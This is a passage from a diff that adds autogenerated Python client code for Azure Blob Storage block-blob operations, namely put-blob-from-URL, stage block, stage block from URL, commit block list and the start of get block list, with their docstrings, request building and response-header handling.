response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def put_blob_from_url( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + copy_source, # type: str + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + blob_tags_string=None, # type: Optional[str] + copy_source_blob_properties=None, # type: Optional[bool] + copy_source_authorization=None, # type: Optional[str] + copy_source_tags=None, # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Put Blob from URL operation creates a new Block Blob where the contents of the blob are + read from a given URL. This API is supported beginning with the 2020-04-08 version. Partial + updates are not supported with Put Blob from URL; the content of an existing blob is + overwritten with the content of the new blob. To perform partial updates to a block blob’s + contents using a source URL, use the Put Block from URL API in conjunction with Put Block List. + + :param content_length: The length of the request. + :type content_length: long + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param copy_source_blob_properties: Optional, default is true. Indicates if properties from + the source blob should be copied. + :type copy_source_blob_properties: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + + request = build_put_blob_from_url_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + copy_source=copy_source, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + copy_source_blob_properties=copy_source_blob_properties, + copy_source_authorization=copy_source_authorization, + copy_source_tags=copy_source_tags, + template_url=self.put_blob_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + put_blob_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def stage_block( # pylint: disable=inconsistent-return-statements + self, + block_id, # type: str + content_length, # type: int + body, # type: IO + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Stage Block operation creates a new block to be committed as part of a blob. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + _content = body + + request = build_stage_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + block_id=block_id, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + request_id_parameter=request_id_parameter, + template_url=self.stage_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def stage_block_from_url( # pylint: disable=inconsistent-return-statements + self, + block_id, # type: str + content_length, # type: int + source_url, # type: str + source_range=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Stage Block operation creates a new block to be committed as part of a blob where the + contents are read from a URL. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_stage_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + block_id=block_id, + content_length=content_length, + source_url=source_url, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.stage_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def commit_block_list( # pylint: disable=inconsistent-return-statements + self, + blocks, # type: "_models.BlockLookupList" + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Commit Block List operation writes a blob by specifying the list of block IDs that make up + the blob. In order to be written as part of a blob, a block must have been successfully written + to the server in a prior Put Block operation. You can call Put Block List to update a blob by + uploading only those blocks that have changed, then committing the new and existing blocks + together. You can do this by specifying whether to commit a block from the committed block list + or from the uncommitted block list, or to commit the most recently uploaded version of the + block, whichever list it may belong to. + + :param blocks: Blob Blocks. + :type blocks: ~azure.storage.blob.models.BlockLookupList + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _blob_cache_control = None + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = self._serialize.body(blocks, 'BlockLookupList', is_xml=True) + + request = build_commit_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.commit_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + commit_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_block_list( + self, + snapshot=None, # type: Optional[str] + list_type="committed", # type: Union[str, "_models.BlockListType"] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.BlockList" + """The Get Block List operation retrieves the list of blocks that have been uploaded as part of a + block blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param list_type: Specifies whether to return the list of committed blocks, the list of + uncommitted blocks, or both lists together. Default value is "committed". + :type list_type: str or ~azure.storage.blob.models.BlockListType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlockList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlockList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlockList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_get_block_list_request( + 